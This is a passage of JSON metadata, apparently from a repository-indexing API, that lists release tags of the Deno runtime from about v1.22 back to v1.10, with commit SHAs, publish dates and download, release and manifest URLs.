2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c